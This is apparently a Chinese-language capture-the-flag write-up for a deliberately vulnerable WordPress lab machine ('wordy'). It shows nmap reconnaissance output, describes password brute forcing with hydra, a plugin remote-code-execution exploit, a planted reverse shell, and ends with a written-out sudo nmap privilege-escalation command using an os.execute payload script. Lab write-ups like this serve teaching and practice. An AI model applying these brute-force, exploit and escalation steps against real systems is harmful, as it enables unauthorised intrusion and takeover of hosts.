信息收集

# nmap -sn 192.168.1.0/24 -oN live.port      
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-25 14:39 CST
Nmap scan report for 192.168.1.1
Host is up (0.00075s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.1.2
Host is up (0.00022s latency).
MAC Address: 00:50:56:FE:B1:6F (VMware)
Nmap scan report for 192.168.1.95
Host is up (0.00013s latency).
MAC Address: 00:0C:29:D7:4A:3C (VMware)
Nmap scan report for 192.168.1.254
Host is up (0.00094s latency).
MAC Address: 00:50:56:F1:2C:8A (VMware)
Nmap scan report for 192.168.1.60
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.02 seconds

判断到存活主机的IP地址为192.168.1.95

# nmap -sT --min-rate 10000 -p- 192.168.1.95 -oN port.nmap        
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-25 14:40 CST
Nmap scan report for 192.168.1.95
Host is up (0.00061s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:D7:4A:3C (VMware)Nmap done: 1 IP address (1 host up) scanned in 3.42 seconds

端口开放情况，只是开放了两个端口，分别是22端口和80端口；

# nmap -sT -sC -sV -O -p80,22 192.168.1.95 -oN details.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-25 14:41 CST
Nmap scan report for 192.168.1.95
Host is up (0.00055s latency).PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Did not follow redirect to http://wordy/
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 00:0C:29:D7:4A:3C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.08 seconds

开放服务的详细信息探测。开放的80端口是Apache2.4.25 存在一个title！ 再也没有其他的信息了！

# nmap -sT --script=vuln -p80,22 192.168.1.95 -oN vuln.nmap 
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-25 14:41 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.1.95
Host is up (0.00051s latency).PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-wordpress-users: 
| Username found: admin
| Username found: graham
| Username found: mark
| Username found: sarah
| Username found: jens
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
| http-enum: 
|   /wp-login.php: Possible admin folder
|   /readme.html: Wordpress version: 2 
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|_  /readme.html: Interesting, a readme.
MAC Address: 00:0C:29:D7:4A:3C (VMware)Nmap done: 1 IP address (1 host up) scanned in 55.06 seconds

默认漏洞脚本的信息探测结果显示：存在wordpress！ 其中存在的几个用户也给我们显示了出来，之后便是一些有关于wordpress的页面！从80端口寻找突破点肯定是没什么疑问的，这里也存在很大的概率是在wordpress上建立初始的立足点！

渗透测试

先看看80端口上的服务是什么样子的：

尝试修改host！

添加： 192.168.1.95 wordy

首页就是这样的啦！既然是存在wordpress！那就先上wpscan工具！

识别到的用户信息：

admin
jens
graham
mark
sarah

和我们的信息收集的脚本得到的用户信息是一样的！既然拿到了这么多的用户名信息，我在这里对于这些用户名有两个思路：

1. 对wordpress的后台进行爆破；
2. 对ssh进行爆破；

先来尝试ssh吧，毕竟能成功的话，直接就拿到了初始的立足点；这里用hydra去测试吧：

尝试了后台的登录密码爆破，没得到密码，同时ssh也失败了！

字典数量过大，没跑出来；继续找网站上面的漏洞！wordpress的版本是5.1.1

但是wpscan并没有发现有漏洞的插件和主题信息！

后面发现了靶场的下载地址下面存在提示：

因为爆破的时候，rockyou字典实在是太大了，很难去爆破！所以给出来了提示！那么我们就匹配出来k01作为一个字典，重新进行爆破！

重新进行爆破：

时间怎么还是这么长~ 30min过去了还是没有结果，还是先去看看插件上的漏洞：

wpscan --url http://wordy/ --plugins-detection aggressive #使用插件主动探测模式进行插件漏洞的探测：

最终还是得到了几个漏洞，XSS就先不关注了；

RCE这个比较好，不知道能不能利用！

还有一个是权限提升~ 很明显了，看看RCE能不能用了！

需要授权，可是没有密码呀，那可怎么办？ 这里回想起来前面只是做了ssh的爆破，是不是密码并不是ssh的，而是网页上面的？ 那就去爆破一下网站的账号和密码吧！

还真的是~ 找到了一个 hydra实在是太慢了 直接先试试能不能ssh上去~

mark helpdesk01

发现上不去~ 还是回到了网页上面！

没什么问题 确实是进来了！功能点比较少，毕竟不是admin，还是先试试我们刚才看到的漏洞！利用searchsploit搜索这个漏洞！

下载45274：

修改这两个文件！

保存之后，直接使用浏览器打开该文件！

然后起监听，在点击submit request！

成功的建立了初始的立足点，接下来就提权

提权

首先提升一下shell的交互性！然后看到了当前目录下面的配置文件，也就是wp的配置文件：wp-config.php

wpdbuser	meErKatZ

于是进入了mysql的数据库中，发现了wp_users表！查看里面的用户数据：

但是尝试解密，会发现只有mark能解密成功，其他的密码都没法解密出来！

查看了etc/passwd文件，发现确实存在这四个活跃的用户，看看他们的家目录下面是否存在相关文件：

在jens目录下面发现了一个文件，这个文件看起来不太一样，看看里面的内容是什么！

发现他解压了backups压缩包到网站的目录下面！

同时在mark目录下面发现了stuff文件！里面又一个文件貌似是提示！

恢复hyperdrive的全部功能（需要跟jens沟通）
为了sarah的告别晚会买礼物
添加一个新的用户grahm 后面应该是密码
申请OSCP课程
给sarah买一个笔记本电脑

利用上面的账号和密码信息，可以切换到graham的权限：

查看sudo权限，发现了：

当前的用户，可以无密码以jens的权限去执行backups脚本，依旧是我们刚才看见的文件！

刚好graham所属的组在devs中，具有修改的权限，因此我们可以将提权的脚本写在里面！

写了反弹在里面，起监听！准备执行

执行之后，收到反弹shell：

查看当前用户具有的sudo权限！

发现当前用户可以无密码以root权限去执行nmap！nmap提权分为两种：

低版本的nmap提权方式是： 利用nmap的--interactive 进入交互式命令行执行！/bin/bash即可
高版本的nmap提权方式为：利用--script执行脚本  nmap的脚本后缀为.nse那么我们可以将提权的命令写入到脚本中 执行echo "os.execute('/bin/bash')" > payload.nsesudo nmap --script=payload

读取最终的flag文件：